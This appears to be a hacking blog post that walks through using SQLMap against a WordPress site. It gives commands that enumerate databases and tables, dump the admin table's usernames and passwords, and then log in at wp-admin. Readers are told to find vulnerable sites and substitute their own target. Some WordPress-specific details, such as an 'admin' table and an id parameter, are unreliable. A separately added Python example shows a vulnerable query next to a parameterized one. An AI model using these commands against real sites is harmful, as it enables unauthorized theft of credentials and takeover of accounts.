In this modern era, the internet has become the internet of things, all because of the World Wide Web. Information is shared over the internet through websites, which have completely changed the direction of the information world. Businesses are going online, and banking is happening over the internet. This has widened the information area, but it has also opened the way to threats against information: cyber attacks put confidential information at risk. There are hundreds of ways to compromise security, as no single system is breach-proof. So in this article I am going to show how WordPress websites can be hacked very easily and how to secure them. There are many methods to hack a website; here I will discuss the most popular one, using SQLMap.

So, how to hack a website with SQLMap?

Before starting, we need a few things.

Requirements

  • Linux OS (I would recommend Kali Linux)
  • SQLMap (if it is not pre-installed on your Linux)
  • WordPress Website

Once you have everything required, we move on to the steps to follow to hack a website with SQLMap.

Steps


  • First of all, make sure you have a ready-to-use machine with Linux installed.
  • Open a terminal, type cd /pentest/database/sqlmap and hit Enter. The terminal is now in the sqlmap directory.
  • Now find the vulnerable site. You can check out how to find vulnerable websites here. After finding a vulnerable website, type python sqlmap.py -u http://target.com/index.php?id=4 --dbs in the terminal. Make sure to replace the link with your target website.
  • When you hit Enter, you will get the database name of the website.
  • Now that we know the database, it's time to get the tables from the Information Schema. For that, enter the following command in the terminal.

python sqlmap.py -u http://target.com/index.php?id=4 -D DatabaseName --tables

  • It will look like the screenshot below in my scenario.
  • This will give us the list of all the tables in the target database.
  • As you can see, we got all the tables of the target database. Now we need to predict which table might be used for users or admins. In most cases, the admin and users tables contain the administrator login info. As you can see, we have a table named admin. Now we will try to get its columns. To get the columns, type the following command in the terminal.

python sqlmap.py -u http://target.com/index.php?id=4 -T admin --columns

  • After hitting Enter, we get the columns of the admin table.
  • Luckily, here we got username and password columns. Now we try to get the usernames and passwords from the admin table. To do that, simply type the following command.

python sqlmap.py -u http://target.com/index.php?id=4 -T admin -U test --dump

  • Wow..!! We got the admin username and password of the WordPress website here.
  • Finally we have the username and password. Now just type the target's admin URL and use the grabbed username and password to log in. The WordPress admin panel URL would look like this:

http://target.com/wp-admin

That's all..! Hope it will work for you. This is how to hack a website with SQLMap. If you encounter any problem, feel free to comment below.
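Every command above depends on the id parameter being concatenated into the SQL statement as raw text. The following added example (not from the original article; the posts table, function names and sample rows are constructed for illustration) shows that vulnerable pattern beside a hardened handler that validates the id and binds it as a query parameter, which is the "how to secure them" half of the topic.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO posts VALUES (?, ?)",
        [(4, "Hello world"), (5, "Unpublished draft"), (6, "Internal notes")],
    )
    return db


def get_post_vulnerable(db, raw_id):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    query = "SELECT id, title FROM posts WHERE id = " + raw_id
    return db.execute(query).fetchall()


def get_post_hardened(db, raw_id):
    # 1. Allow-list validation: a short, plain ASCII decimal number only.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be numeric")
    # 2. Parameterized query: the value is bound as data, never parsed as SQL.
    query = "SELECT id, title FROM posts WHERE id = ?"
    return db.execute(query, (int(raw_id),)).fetchall()


def handle_request(db, raw_id):
    """Return (HTTP status, rows) the way a hardened page handler would."""
    try:
        return 200, get_post_hardened(db, raw_id)
    except ValueError:
        return 400, []


if __name__ == "__main__":
    db = make_db()
    tampered = "4 OR 1=1"  # constructed tampered value for index.php?id=
    print("vulnerable, id=4       :", get_post_vulnerable(db, "4"))
    print("vulnerable, tampered id:", get_post_vulnerable(db, tampered))
    print("hardened,   id=4       :", handle_request(db, "4"))
    print("hardened,   tampered id:", handle_request(db, tampered))
```

In WordPress code the same binding is done with $wpdb->prepare() instead of building the query string by hand.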


Note: Use a virtual machine, and scan any program on VirusTotal before downloading it to your host machine, for your privacy.